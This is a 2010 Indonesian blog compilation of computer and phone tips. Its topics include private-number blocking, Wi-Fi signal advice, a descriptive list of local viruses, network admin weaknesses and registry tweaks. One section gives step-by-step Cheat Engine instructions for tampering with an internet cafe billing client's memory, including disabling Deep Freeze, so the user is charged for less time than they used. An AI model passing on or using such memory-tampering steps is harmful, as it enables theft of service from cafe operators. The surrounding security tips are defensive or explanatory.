Only to know

TRIK MENGETAHUI DAN MEMBLOKIR PRIVAT NUMBER NOMOR PRIBADI

2010-10-31T20:19:00.000-07:00

1) Aktifkan VMB ” Voice Mail Box” kartu
anda.Jika anda tidak tahu cara mengaktifkan "VMB" silahkan tanya ke
Operator selular sobat.Nah saat yg private number nelpon buruan deh anda
matikan hape anda,maka yg misscall akan terhubung ke VMB td.Sabar
sebentar Bro beberapa menit kemudian Hidupkan lagi HP anda dan tinggal
tunggu sms dari server provider kartu HP anda yg memberitahukan bahwa
anda telah dihubungi.
Catatan :
Untuk pelanggan Telkomsel tidak
bisa menggunakan private number.

Ada Beberapa Cara untuk Nge-Blok
Private Number (Anti Private Number) saya ambil dari Kasus tetengga
sebelah dan suda di Coba ternyata berhasil :
No Kartu HP sobat
Imigrasi (Kaya Perpindahan penduduk gt Bro).
Contoh Kasus : Kartu XL
Jempol imigrasi ke ke XL Bebas (Bukan Ganti Kartu Perdana) Setelah di
Coba ternyata no Yang Private Number bisa kelihatan.Silahkan Sobat Cek
sendiri dan Share di sini Berhasil apa tidak.(Andaikata Provider XL
belum meng-Upgrade Sistem-nya).

2)Jika Sobat menggunakan Jenis HP
Motorola rokr e6,..pake aplikasi CALLMANAGER,..apps ini bisa ngeblock
private number atau nomer lain yang kita kehendakin,..di sana juga ada
pengeturan di mana hp bisa ngirim SMS secara otomatis kepada nomer yg di
blok,..dengan sms yang sudah kita setting sebelumnya.Silahkan Searching
di Download.com

3)Ada juga aplikasi DATA SAFE,..aplikasi
ini,…adalah aplikasi secure phone,..yang mana fungsinya banyak banget di
antaranya :
HP akan secara otomatis mengirim pesan,ke nomer tertentu
yg udah kita set,..jika SIM card nya di ganti( misal hape di curi ,bisa
di lacak bro,…setiap kurang dari 10 detik HP akan mengirim sms,..yang
isinya tentang kegiatan HP tsb,..misal HP tsb udah di pake buat nelpon
sapa aja,,dan di telpon sapa aja,..bisa ketahuan broooo…)
* SMS dari
satu sim card tidak akan ketahuan / terbaca,bila HP di masukin sim car
lain,..No HP juga lho,…jadi aman kalo misal hape di pinjem temen,..sms
kita ama daftar no hape,..gak bakal di isengin ma temen
* Bisa back
up seluruh kontak dan sms ke memory card silahkan di coba bagi yg punya
hp rokr e6

4) Kal0 HP anda s0nyericss0n, untuk mem-black list
private number cukup pake ‘accept call 0nly fr0m list’ aja. Standarnya
all callers. Kl0 k0ntaknya banyak, bikin k0ntak gr0up dlu aja.
Ingat..n0m0r baru juga gak bisa telef0n ke kita, seperti telf dari
wartel dsbnya.

) Menggunakan Aplikasi Best Blacklist
whitelist
dan blacklist. Whitelist menolak panggilan yang nomernya tidak
didaftarkan sementara Blacklist menolak nomer yang kamu daftarkan.
Private
number?? Tidak masalah, saat dalam mode blacklist kamu bisa menolaknya,
dan saat mode whitelist otomatis akan ditolak. untuk download app
Backlist cari aja di GETJAR.

tips.tr1cks.com

Internet Gratis lewat Handphone dengan Operator Lokal

2010-10-31T19:41:00.000-07:00

1.XL
Silahkan download
settingan DISINI

2.Telkomsel

silahkan
download settingannya DISINI

3.Indosat
download settingannya DISINI

4.axis
silahkan download settingan DISINI

Only to Know!!!!!

2010-10-31T19:38:00.000-07:00

top 10 Virus 2010

Spoiler for virus 1:
1. Discusx.vbs
Virus VBScript yang satu ini, memiliki ukuran sekitar 4.800 bytes. Dia akan mencoba menginfeksi di beberapa drive di komputer Anda, termasuk drive flash disk, yang jika terinfeksi akan membuat file autorun.inf dan System32.sys.vbs pada root drive tersebut. Selain itu, ia pun akan mengubah caption dari Internet Explorer menjadi “.:iscus-X SAY MET LEBARAN! [HAPPY LEBARAN ?!]::.”.

Spoiler for virus 2:
2. Reva.vbs
Lagi, virus jenis VBScript yang lumayan banyak dikeluhkan oleh beberapa pembaca. Ia akan mencoba menyebarkan dirinya ke setiap drive di komputer Anda termasuk drive flash disk. Pada drive terinfeksi akan terdapat file reva.vbs, autorun.inf, dan shaheedan.jpg. Selain itu, ia pun akan mengubah halaman default dari Internet Explorer agar mengarah ke situs lain

Spoiler for virus 3:
3. XFly
PC Media Antivirus mengenali dua varian dari virus ini, yakni XFly.A dan XFly.B. Sama seperti kebanyakan virus lokal lainnya, ia dibuat menggunakan Visual Basic. Memiliki ukuran tubuh sebesar 143.360 bytes tanpa di-compress. Dan ia dapat menyamar sebagai folder, file MP3 WinAmp atau yang lainnya dengan cara mengubah secara langsung resource icon yang ada pada tubuhnya. Ini akan lebih mempersulit user awam dalam mengenalinya. Pada komputer terinfeksi, saat menjalankan Internet Explorer, caption-nya akan berubah menjadi “..:: x-fly ::..”, dan saat memulai Windows pun akan muncul pesan dari si pembuat virus pada default browser. Atau setiap waktu menunjukan pukul 12:30, 16:00, atau 20:00, virus ini pun akan menampilkan layar hitam yang juga berisi pesan dari si pembuat virus.

Spoiler for virus 4:
4. Explorea
Virus yang di-compile menggunakan Visual Basic ini hadir dengan ukuran sekitar 167.936 bytes, tanpa di-compress. Menggunakan icon mirip folder standar Windows untuk mengelabui korbannya. Virus ini akan menyerang Registry Windows Anda dengan mengubah default open dari beberapa extension seperti .LNK, .PIF, .BAT, dan .COM. Pada komputer terinfeksi, disaat-saat tertentu terkadang muncul pesan error, contohnya pada saat membuka System Properties.

Spoiler for virus 5:
5. Gen.FFE
Gen.FFE atau pembuatnya menamakan Fast Firus Engine merupakan salah satu program Virus Generator buatan lokal. Dengan hanya menggunakan program ini, tidak dibutuhkan waktu lama untuk dapat menciptakan virus/varian baru. Virus hasil keluaran program ini menggunakan icon mirip gambar folder standar bawaan Windows. Ia pun akan memblokir akses ke Task Manager, Command Prompt, serta menghilangkan beberapa menu di Start Menu. Ia juga akan membaca caption dari program yang aktif, apabila terdapat string yang berhubungan dengan antivirus maka program tersebut akan segera ditutup olehnya.

Spoiler for virus 6 sampai 10:
6. Hampa
Virus yang juga dibuat menggunakan Visual Basic dan ber-icon-kan folder ini memiliki ukuran tubuh sekitar 110.592 bytes, tanpa di-compress. Banyak sekali perubahan yang ia buat pada Windows, seperti Registry, File System, dan lain sebagainya, yang bahkan dapat menyebabkan Windows tidak dapat digunakan sebagaimana mestinya. Pada komputer yang terinfeksi oleh virus ini, saat memulai Windows akan muncul pesan dari si pembuat virus.

7. Raider.vbs
Virus jenis VBScript ini berukuran sekitar 10.000 bytes, jika file virus dibuka dengan Notepad misalnya, maka tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Pada Registry, ia pun memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.

8. ForrisWaitme
Virus yang dibuat dengan Visual Basic ini menggunakan icon mirip folder standar Windows untuk melakukan penyamarannya. Beberapa ulahnya adalah menukar fungsi tombol mouse kiri dengan kanan, menghilangkan menu Folder Options, membuat file pesan “baca saya.txt” pada drive terinfeksi, dan masih ada yang lainnya.

9. Pray
Virus lokal ini dibuat menggunakan Visual Basic. Kami mendapati 2 varian dari virus ini, untuk varian Pray.A tidak memiliki icon, sementara untuk varian Pray.B menggunakan icon mirip Windows Explorer. Jika komputer terinfeksi oleh virus ini, saat penunjuk waktu di komputer tersebut menunjukan pukul 05:15, 13:00, 16:00, 18:30, dan atau 19:45, virus ini akan menampilkan pesan yang mengingatkan user untuk melakukan shalat.

10. Rian.vbs
Virus VBScript ini memiliki ukuran 3788 bytes. Saat menginfeksi, ia akan menciptakan file baru autorun.inf dan RiaN.dll.vbs pada setiap root drive yang terpasang di komputer korban, termasuk Flash Disk. Komputer yang terinfeksi oleh virus ini, caption dari Internet Explorer akan berubah menjadi “Rian P2 Humas Cantiq"

(sumber:forumkami.com)

2010-10-31T18:53:00.000-07:00

Sebagian dari kita pengguna komputer pasti ingin sebuah keamanan lebih pada komputer kita. Terutama bagi anda yang membawa laptop di tempat kerja atau sekolah. Ketika anda sedang menggunakan komputer anda, dan tiba-tiba anda harus segera beranjak dari komputer anda karena dipanggil atasan kita. Harapan kita pasti komputer yang kita tinggalkan tetap aman tanpa ada yang mencuri data atau ada yang mengunakannya selain anda sebagai pemiliknya, karena kita tidak sempat mematikan komputer kita.

Pernahkah terbayang di pikiran kita untuk mengunci komputer kita dengan flash disk. Saat ini sudah ada software yang mampu melakukan hal tersebut. ID USB Lock Key nama software tersebut. Kali ini Penulis mencoba menyajikan ID USB Lock Key versi Portable.

Penggunaanya sangatlah mudah,

Download ID USB Lock Key versi Portable
Ekstrak file ID USB Lock Key versi Portable hasil download dengan Win Rar.
Masukkan FlashDisk yang akan dijadikan sebagai Kunci komputer anda.
Pada folder hasil extrak, klik 2 kali file “ID USB Lock Key”.
Akan muncul tampilan ID USB Lock Key versi Portable dengan warna oranye.
Untuk membuat data pengunci pada flash disk anda, klik pada menu “Generate Key“.
Setelah berhasil, maka akan tampil jendela dengan pesan “The key generated sucesfully”, kemudian klik OK.
Untuk mengaktifkan ID USB Lock Key versi Portable ini, klik menu “Launch systray”.
Untuk mengunci komputer anda, Lepas terlebih dahulu Flash Disk yang anda gunakan sebagai pengunci.
Kemudian pada systry anda ( pada taskbar anda akan mucul icon port USB dari ID USB Lock Key ) Klik kanan dan Pilih menu Lock The Komputer. ( anda juga dapat melakukan penguncian dengan menekan Ctrl + Alt + L )
Selanjutnya layar komputer anda akan blank dan terdapat peringatan “Please insert the USB Drive containing your generated key ID USB LOCK KEY”
Untuk membuka penguncian tersebut, masukkan kembali FlashDisk ( yang anda gunakan sebagai kunci ).

Sumber: supralova.comli.com/tak-berkategori/kunci-komputer-anda-dengan-flash-disk-2

6 trik tombol “I’m Feeling Lucky” pada google search

2010-10-31T18:47:00.000-07:00

6 trik tombol “I’m Feeling Lucky” pada google search :

Isikan kata “googoth” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akan segera dibawa masuk ke tampilan google yang gelap dan terkesan gothic.
Isikan kata “ewmew fudd” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akan segera dibawa masuk ke tampilan google dengan teks versi tokoh Elmer Fudd dari Warner Bros.
Isikan kata “xx-klingon” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akan segera dibawa masuk ke tampilan google dengan bahasa suku Klingon.
Isikan kata “google bsd” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Coba perhatikan ikon google yang biasa menjadi ikon bsd.
Isikan kata “google linux” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Coba perhatikan ikon google yang biasa menjadi ikon linux.
Isikan kata “google easter egg” pada kotak teks, lalu tekan tombol “I’m Feeling Lucky”. Temen2 akan disuguhi dengan tampilan mesin pencari google dengan sebuah game menangkap telur paskah, dimana temen2 bisa mengendalikan gerak kelinci tersebut.

Tambahan :
Tombol I’m Feeling Lucky sebenernya berfungsi untuk langsung menghantarkan halaman ke hasil pencarian yang diperingkat pertama. jadi klo ngeklik I’m feeling lucky, otomatis akan langsung memunculkan halaman yang berperingkat pertama dari result google.

Googoth itu bukan buatan google, tapi oleh orang2 yang suka dengan gothic.
ewmew-fudd dan xx-klingon merupakan fitur bahasa dari google. bisa liat bahasa (resmi) lainnya di preferensi. (ada juga basaha jawa, hacker, dll)
Google-bsd dan google-linux memang di spesifikasikan hasil pencariannya untuk semua yang berhubungan dengan bsd/linux.
google easter egg, yah emang easter egg dari google.

11 Kelemahan Yang Kerap Tidak Disadari Admin Jaringan

2010-10-04T23:33:00.000-07:00

11 Kelemahan Yang Kerap Tidak Disadari Admin Jaringan !

Ancaman pembobolan ke dalam sistem jaringan tak hanya bersumber dari para peretas, orang dalam alias staf perusahaan itu sendiri pun bisa melakukannya.

Tentu saja hal ini membutuhkan suatu kesigapan dari seorang admin untuk menjaga sistem keamanan jaringan perusahaan agar tidak dijebol.

Berikut 11 hal yang menurut penulis dapat menjadi perhatian khusus bagi para admin agar kehandalan sistem keamanan jaringan perusahaan di mana Anda bekerja tetap terjaga:

1. Mudah tertipu dan terlalu percaya kepada pengguna/user Anda, terutama para staf wanita atau sahabat yang meminta pertolongan.

2. Gedung dan pintu akses masuk/keluar yang tidak aman.

3. Dokumen-dokumen dan disk atau peripheral komputer yang belum dihancurkan atau tidak hancur pada saat sudah dibuang ke tempat sampah dapat dibaca oleh pihak lain.

4. Password yang lemah atau bahkan sistem jaringan tidak menggunakan password sama sekali.

5. Pertahanan jaringan yang kurang kuat karena mungkin tidak ada firewall dan sebagainya.

6. Akses kontrol yang lemah, missing file dan beberapa akses yang tidak seharusnya diberikan kepada user yang tidak perlu.

7. Sistem yang tidak dilakukan patch.

8. Otentikasi dan information disclosure aplikasi web tidak dilakukan sembarangan.

9. Sistem wireless berjalan dengan setting default dan tanpa WEP, WPA atau WPA2, sangat riskan dan mudah untuk dijebol.

10. SNMP melakukan enable jaringan host dalam keadaan default atau hanya menggunakan mode guest untuk komunitasnya sehingga sangat mudah untuk dijebol.

11. Menggunakan firewall, router, remote access dan peralatan dial up dalam keadaan default atau password guest atau menggunakan password yang terlalu mudah, karena ini sebagai jalan masuk hacker ke dalam sistem.

Di bawah ini beberapa port yang sangat sering dilakukan penetrasi (hacking) oleh para peretas dan staf yang nakal untuk mencoba-coba menjebol sistem keamanan jaringan:

- TCP port 20 dan 21 FTP (File Transfer Protocol)
- TCP port 23 Telnet (Terminal Emulation)
- TCP port 25 SMTP (Simple Mail Transfer Protocol)
- TCP dan UDP port 53 DNS (Domain Name System)
- TCP port 80 dan 443 HTTP dan HTTPs (Hypertext Transfer Protocol)
- TCP port 110 POP3 (Post Office Protocol version 3)
- TCP dan UDP port 135 RPC
- TCP dan UDP port 137 – 139 NetBIOS over TCP/IP
- TCP dan UDP port 161 SNMP (Simple Network Management Protocol)

Demikian, semoga beberapa informasi ini dapat dijadikan referensi bagi kalangan admin jaringan untuk lebih peduli dalam mengamankan sistem jaringan dan komputer mereka.

*) Penulis adalah IGN Mantra, Analis Senior Keamanan Jaringan dan Pemantau Trafik Internet ID-SIRTII sekaligus Dosen Keamanan Jaringan dan Cybercrime, dapat dihubungi di email: mantra@idsirtii.or.id.

Cara mnegurangi waktu billing

2010-10-04T23:31:00.000-07:00

Cara Cerdik Mengurangi Waktu Billing Warnet

Bagian Cheat Engine itu adalah salah satu Hack Tools kesukaan yang paling ian sukai,Mengapa ? Karena hampir semua game dan software bisa di hack oleh software satu ini tetapi bukan hanya itu saja karena jika ingin belajar cheat engine harus mempunyai niat yang kuat dan rasa ingin tahu yang tinggi pula.Langsung saja ian kasih tahu caranya !!

1. Pertama yang dibutuhkan adalah sebuah computer lengkap dengan perangkatnya
2. Uang untuk main di warnetnya
3. Download lah Cheat Engine versi yang terbaru,Kalau yang sekarang yang versi 5.5
4. Setelah itu jalankan software tersebut lalu klik yang mirip gambar computer..Letaknya di bawah TAB file
5. Kalau sudah di klik pilih Client008.exe (kalau gak bisa di open dan kata cheat enginenya error sobat harus disabled Deep Freenze ) Klo gak tau Deep Freenze berarti jarang ke warnet ya ??? Itu lohh yang gambarnya beruang putih,,,, Tau kan ???
6. Setelah tahap kelima yang melelhakan selesai sobat pilih Scan Typenya yang UKNOWN INITIAL VALUE ( yang bereati kita tidak tahu valuenya )
7. Setelah itu First Scan dan tunggu beberapa saat, Klo dah matang angkat wkwkwkwkwk Bercanda
8. Lalu scan typenya ganti dengan Increased Value ( yang artinya mencari Value yang bertambah ) Value itu angka Menurut Ian )
9. Nahh pada saat ini pasti banyak Addres
10. Pada saat ini kita belum bisa menemukan Valuenya karena masih banyak sekali address, MAKA dari itu kita Scan lagi dengan yang Increased Value by (Isilah dengan angka satu ) Karena waktu di billing pasti nambahnya satu terus…. Ngerti gak ??? Contoh sekarang sobat dah main selama 10.20 lalu bertambah lagi 10.21 lalu bertambah lagi 10.22 dan seterusnya kan ??? MAKA dari itu angkanya harus di pilih satu
11. Kalau sudah tahap ini sobat sudah dapat mencarinya dengan mata tanpa perlu di scan lagi. Dengan cara mencari angka yang sama dengan waktu billing
12. Contoh : | 01.00 = 60 | 10.00 = 600 | 50.00 = 3000 | yang warna biru itu sama aja detik
13. Kalau dah ketemu yang mirip dengan angka di billing sobat…Lalu sobat…Lalu klik angkanya dan kurangi angkanya sedikit saja misal yang tadinya 2398 jadi 2388

Ohh ya kalau anda seorang yang gemar gunain cheat engine pastinya tidak perlu tutorial ini karena sudah hafal kuncinya dan tinggal otak atik dikit hihihihihihi……Mau tau gak sekarang ian lagi mau Hack point blank supaya point ian banyak hahahahaha tapi ian harus penelitian dulu.

Sumber : http://www.komputer1.com/artikel/Inilah-Cara-Terhebat-Mengurangi-Waktu-Billing-Warnet-Pake-Cheat-Engine

5 Software Bajakan Favorit di Indonesia

2010-10-04T23:29:00.000-07:00

5 Software Bajakan Favorit di Indonesia

Indonesia merupakan salah satu negara dengan tingkat pembajakan terbesar di dunia. Dengan presentase hingga 85% pada 2008 lalu, mendapuk Tanah Air menempati posisi ke-12 secara global.

Mau tahu 5 besar software yang paling sering dibajak berdasarkan pengamatan Business Software Alliance (BSA):

1. Keluarga Microsoft

Sulit rasanya memungkiri ketergantungan pengguna komputer di Indonesia atau bahkan di dunia terhadap software buatan perusahaan milik Bill Gates ini. Sistem operasi Windows dan aplikasi perkantoran Microsoft Office merupakan dua software yang paling sering dibajak.

Diyakini Kepala BSA Indonesia Donny A. Sheyoputra, mulai dari pengguna komputer di perkantoran hingga rumahan telah bergantung kepada dua software Microsoft tersebut. Di luar Windows dan Office, ada pula Microsoft Visio yang dikatakan juga sering ditemui ketika digelar razia.

2. Adobe

Software-software keluaran Adobe juga dianggap cukup sering menjadi korban bajakan. Produk yang paling sering jadi korban adalah Photoshop. Aplikasi ini juga bak menjadi aplikasi edit gambar/foto wajib bagi para pengguna komputer Tanah Air.

3. Symantec

Untuk jajaran antivirus, Symantec dengan produk Nortonnya menjadi aplikasi yang sering dibajak. Symantec ‘bersaing’ dengan McAfee untuk menjadi software keamanan yang sering digunakan tanpa izin.

4. Autodesk

Meski termasuk aplikasi yang segmented alias hanya digunakan oleh kalangan tertentu tak membuat software keluaran Autodesk tak diminati oleh pengguna tak resmi. Donny mengatakan, software Autodesk tak hanya untuk mereka yang bekerja di industri desain seperti arsitektur dan pengembang bangunan. Namun juga bisa dipakai oleh perusahaan biasa untuk merancang tata letak peralatannya.

5. Corel

Sementara Corel juga menjadi aplikasi edit gambar/foto yang sering ditemui ketika razia digalakkan. Donny juga tak yakin, aplikasi yang ada di komputer-komputer sitaan tersebut digunakan semaksimal mungkin. “Yang penting instal saja,” tukasnya kepada detikINET.

Memang tak ada rincian data lengkap perihal software-software yang paling sering dibajak tersebut. Namun setidaknya, dari pengalaman BSA ini dapat tergambarkan software apa saja yang pling sering digunakan secara ridak resmi di Tanah Air.

sumber : detik

10 Cara Untuk Memperkuat Sinyal Wifi Komputer

2010-10-04T23:20:00.000-07:00

10 Cara Untuk Memperkuat Sinyal Wifi Komputer

Wireless Router bukan lagi menjadi barang baru dan mungkin sebagian besar pengguna internet sudah mempunyai alat ini di rumahnya untuk berbagi pakai koneksi internet secara nirkabel (wireless).

Kali ini, ane akan mencoba membahas masalah/ kendala yang mungkin sering dihadapi para pengguna wireless router yaitu mengenai kekuatan sinyal yang ada di wireless router.

Bagaimana membuat sinyal Wi-Fi bisa optimal atau menjangkau area yang lebih luas? Berikut beberapa hal yang perlu diperhatikan:

1. Letakkan Wireless Router di tengah ruangan

Mengingat sebagian besar wireless router menggunakan antena jenis Omni Directional (menyebar ke seluruh arah), sebaiknya wireless router diletakkan di tengah ruangan sehingga bisa menjangkau setiap sudut ruangan.

2. Perhatikan penempatan wireless router

Jangan menempatkan wireless router di lantai, berdekatan dengan dinding atau berdekatan dengan benda yang mengandung besi (metal) karena semuanya itu akan mengurangi kekuatan sinyal yang ada. Semakin dekat anda letakkan dengan ketiga hal diatas, akan semakin lemah sinyalnya.

3. Mengganti antena yang ada di Wireless Router

Seperti yang kami katakan di point no. 1 bahwa sebagai router menggunakan antena jenis Omni Directional yang bersifat menyebar ke seluruh arah. Jika memang anda sering menggunakan di seluruh ruangan atau sudut maka antena jenis ini sangat cocok tetapi jika anda lebih sering menggunakannya di satu tempat yang, mungkin penggantian antena bisa lebih memperkuat sinyal.

Salah satu contoh jenis antena untuk masalah diatas adalah High Gain Antenna dimana sifat penyebarannya hanya ke satu titik sehingga sinyal yang anda dapatkan akan lebih baik tetapi tidak kami sarankan bisa anda sering berpindah tempat.

4. Ganti Wireless network adapter dengan yang lebih baik

Bila anda menggunakan komputer (bukan notebook), tentu anda memasang Wireless Network Adapter di dalamnya. Pastikan bahwa Network Adapter yang anda gunakan cukup baik dan bisa juga mengganti antena yang ada dengan kualitas yang lebih baik seperti High Gain Antenna diatas.

5. Tambahkan Wireless Repeater bila perlu

Walaupun antena telah diganti dengan yang lebih baik bukan berarti anda bisa menjangkau lokasi yang lebih jauh. Untuk itu kadang kita memerlukan alat tambahan yang bernama Wireless Repeater.

Wireless Repeater berguna untuk memperkuat dan memperpanjang sinyal WiFi yang ada sehingga jangkauannya menjadi lebih luas, misal dengan antena biasa, jangkauan sinyal hanya mencapai 100 m tetapi dengan ini, jangkauan sinyal bisa 2x lebih panjang yaitu 200m atau lebih.

Tetapi memang untuk penambahan alat seperti ini, kita harus mengeluarkan uang cukup banyak.

6. Mengganti Wireless Channel yang ada

Sinyal WiFi bisa berjalan di beberapa channel sekaligus, jika anda merasa sinyal yang ada kurang bagus dan menemukan banyak channel di dalamnya, anda sebaiknya mengubah ke channel yang lebih sedikit.

Dan tidak perlu kuatir dengan penggantian channel ini karena komputer/ notebook akan menditeksi dan menyesuaikan secara otomatis apabila ada pergantian channel.

7. Jauhkan Wireless Router dari perangkat elektronik tertentu

Sinyal Wifi bekerja di frekuensi 2,4 GHz, untuk itu sebaiknya anda jauhkan wireless router anda dari perangkat elektronik yang menggunakan frekuensi yang sama.

Misalnya telpon cordeless (tanpa kabel) yang biasanya juga menggunakan frekuensi yang sama yaitu 2,4 GHZ. Apabila ini terjadi, mau tidak mau anda harus menggantinya dengan telpon cordless yang menggunakan frekuensi yang berbeda seperti 900 MHz atau mengganti telpon cordless menjadi telpon biasa, ini solusi lebih murah.

8. Selalu melakukan update firmware untuk Wireless Router anda

Biasanya setiap produsen yang cukup terkenal seperti D-Link, Linksys dan lainnya selalu mengeluarkan firmware terbaru untuk router anda supaya kinerja router menjadi lebih baik. Lakukanlah upgrade firmware tersebut yang biasanya disediakan di web mereka.

9. Gunakan merek yang sama untuk jaringan nirkabel anda

Walaupun secara garis besar, penggunaan merek yang berbeda untuk perangkat jaringan (router, adapter) tidak mengalami masalah tetapi biasanya sinyal akan menjadi lebih baik bila kita menggunakan satu merek.

Misalnya Router anda merek Linksys, sebaiknya Wireless Adapter yang digunakan di komputer juga menggunakan merek yang sama.

10. Melakukan upgrade jenis WiFi dari 802.11b ke 802.11g

Kami yakin sebagian pemilik jaringan sudah menggunakan format Wifi jenis G tetapi jika anda masih menggunakan jenis 802.11b maka sebaiknya anda menggantinya atau setidaknya membuat semua jaringan menggunakan format WiFi yang sama.

Memang sudah ada 802.11n yang menjanjikan kecepatan transfer yang lebih cepat dan jangkauan yang lebih jauh, tetapi perlu dicatat bahwa format N ini masih belum disertifikasi.

thanks to : makoto @adsense-charmins.blogspot.com

Proteksi laptop dengan wajah

2010-10-04T20:17:00.000-07:00

Memproteksi Laptop Dengan Password Wajah Sendiri

Veryface Recognition adalah software yang akan memproteksi komputer kalian dari ancaman pembobolan.

Biasanya komputer dilengkapi dengan password kombinasi angka dan huruf, Tetapi jika kalian menggunakan software ini wajah kalian yang akan menjadi passwordnya. Keren bukan ?
Ini screenshot dari Veryface Recognition

Ini Link Downloadnya : http://hotfile.com/dl/67798700/b9290cb/veriface_recognition_for_xp.zip.html

Login 2 akun Facebook dengan Firefox

2010-10-04T20:07:00.000-07:00

Cara untuk login 2 Akun FB dengan Firefox:

1.run> firefox.exe-Profil Manager
2.ok
pilihan 3.muncul profil mozilla
4.create profil
5.rename dengan nama Anda
6.aplly> ok
7.buat pintas mozilla baru
8.rename dengan nama Anda
9.klik mozilla kanan icon properties>
10.tambahkan angkasa. Exe pada kolom target> Jenis-no-remote-p ruang (nama firefox baru)
11.apply> ok

10 Game yang paling cepat tamat

2010-10-04T20:05:00.000-07:00

10 Game Yang Paling Cepat Tamat !

Beberapa game terkadang memiliki alur cerita yang cukup panjang, namun tidak sedikit juga yang memiliki kisah sederhana hingga cepat sekali dituntaskan. Seperti 10 game berikut ini. Game tersebut antara lain:

10. Fable
Fable merupakan game yang memiliki banyak sekali misi unik. Namun karena keterbatasan cerita, game tersebut dapat dituntaskan hanya dalam 7 jam saja.

9. Wanted: Weapons of Fate
Game ini diadopsi langsung dari versi layar lebarnya, gamer akan berperan sebagai jagoan yang bisa membelokkan arah peluru. Meski banyak adegan pertempuran namun game ini bisa diselesaikan dalam 4 jam.

8. Pokemon Snap
Ini mungkin game paling cepat yang ada pada seri Pokemon. Gamer hanya membutuh waktu kurang dari satu jam untuk menyelesaikan seluruh misinya.

7. Quantum of Solace
Kisah petualangan agen rahasia 007 dalam game ini memang terbilang seru. Sajian grafis hingga tatanan suara cukup baik meski tidak mengesankan, namun hanya perlu waktu 4 jam untuk menyelesaikan misinya.

6. Army of Two: The 40th Day
Meski menawarkan konsep permainan yang apik, tapi agaknya Army of Two: The 40th Day kurang diminati para gamer. Game ini pun hanya memiliki jalan cerita sekitar 5 jam.

5. Yoshi's Story
Yoshi's Story bisa dibilang memiliki hampir semua elemen yang disukai game. Tatanan suara yang indah, grafis yang luar biasa, namun tidak dibarengi jalan cerita yang menarik. Pemain hanya butuh 4 jam untuk menyelesaikan game tersebut.

4. Mirror's Edge
Game Mirror's Edge sempat menjadi fenomenal di masanya. Game ini unik, memiliki sistem permainan yang tidak biasanya. Grafis pun tampil baik berkat dukungan PhysX dari Nvidia, tapi hanya butuh 4 jam untuk menyelesaikannya.

3. The Bouncer
Ketika ingin dirilis, game ini memamerkan segudang kelebihannya jika dibandingkan Final Fantasy. Namun kehadirannya justru mengecewakan, bahkan untuk menyelesaikannya gamer hanya membutuhkan waktu sekitar 1 jam.

2. Rogue Warrior
Tidak banyak yang bisa dibanggakan dalam game ini. Ceritanya tidak menarik, kualitas grafis yang buruk, serta tatanan suara yang mengecewakan. Ketika memainkan game ini, gamer hanya mendapatkan berbagai kata-kata kotor selama 4 jam.

1. Kane & Lynch 2: Dog Days
Di antara game yang telah disebutkan di atas, Kane & Lynch 2: Dog Days merupakan game yang paling baru. Meski demikian sang pengembang sepertinya tidak memperhatikan jalan cerita yang hanya berdurasi 4 jam.

Thanks to : Makoato @adsense-charmins.blogspot.com

Menampilkan pesan startup

2010-09-19T21:18:00.000-07:00

Pernah sekali waktu ketika pengetahuan komputer saya masih sangat pas-pasan, saya kaget ketika membuka komputer teman karena ketika desktop akan segera terbuka muncul pesan “Perhatian….!!! anda telah salah masuk, Komputer ini akan meledak dalam hitungan mundur 60 detik”. Belakangan saya tahu itu hanya tipuan start up yang dimasukkan dalam registry editor. Pernah mengalami hal yang sama?

Sebenarnya trik-nya gampang, andapun dapat memaksa orang lain untuk membaca pesan anda sebelum orang tersebut menggunakan computer anda. Hitung-hitung untuk mengerjai orang-orang jahil. Caranya mudah ;

Klik tombol [Start > Run… ] dan pada jenela Run ketik [regedit] lalu [Ok]
Pada jendela Registry Editor buka [HKEY_LOCAL_MACHINE SOFTWAREMicrosoftWindowsNTCurrentVersionWinlogon].
Di sebelah kanan, klik kanan pada [LegalNoticeCaption] dan pilih [Modify]
Pada jendela Edit String masukkan judul pesan anda lalu klik [Ok]. Lembar pengumuman dan judulnya sudah ada, dan sekarang isinya yang harus dibuat.
Klik kanan pada [LegalNoticeText] dan pilih [Modify]
Pada jendela Edit String masukkan isi pesan anda lalu klik [Ok].
Pesan anda sudah didaftar dalam computer. Untuk melihat hasilnya restart-lah kompter anda.

Pesan teknis; hati-hatilah mengutak-atik registry editor. Alangkah baiknya membackup registry terlebih dahulu. Selamat mencoba!

Thanks to : http://agussale.com

Trik mencegah perubahan wallpaper

2010-09-19T20:48:00.000-07:00

Kadang-kadang orang yang memakai komputer kita, berulah dan iseng mengganti wallpaper pada desktop PC kita. Jika menggantinya dengan image yang sopan tidak menjadi apa. Akan jadi masalah jika menggantinya dengan image/gambar yang tidak senonoh. Coba bayangkan jika hal ini terjadi, anak kita akan melihat apa yang seharusnya belum pantas dilihatnya dan tentunya isteri kita akan menjadi sangat marah karenanya. Pada TIPS DAN TRIK KOMPUTER kali ini, kita akan mencoba mencegah hal itu terjadi dengan gpedit.msc. Kalaupun dengan tips dan trik ini, orang lain masih bisa menggantinya, tetapi paling tidak hal ini dapat sedikit menghambatnya.

Langkah-langkahnya

· Buka gpedit.msc dengan mengklik Start > Run > ketik gpedit.msc kemudian OK atau ENTER hingga muncul jendela Group Policy Editor.

· Kemudian klik User Configuration > Administrative Templates > Control Panel > Display. (lihat gambar di bawah ini)

· Kemudian pada sebelah kanan klik double Prevent Changing Wallpaper hingga muncul jendela Prevent Changing Wallpaper Properties seperti di bawah ini.

· Kemudian pilih opsi Enabled. Kemudian klik OK atau Apply.

· Selanjutnya tutup jendela Group Policy Editor tersebut.

· Tanpa harus logg off dahulu, coba sekarang kita buka Display Properties dengan mengklik kanan pada area desktop kemudian pilih Properties maka akan tampil jendela Display Properties. (lihat gambar di bawah ini).

· Kemudian klik tab Desktop. Maka apa yang terjadi adalah kita tidak bisa mengganti dengan wallpaper yang lain.

· Jika ingin mengembalika ke kondisi semula, ulangi prosedur di atas, hanya pada opsi Prevent Changing Wallpaper pilih Not Configurated.

Thanks to : http://onoid.blogspot.com

Memanage Flashdisk Jadi Senjata Ampuh

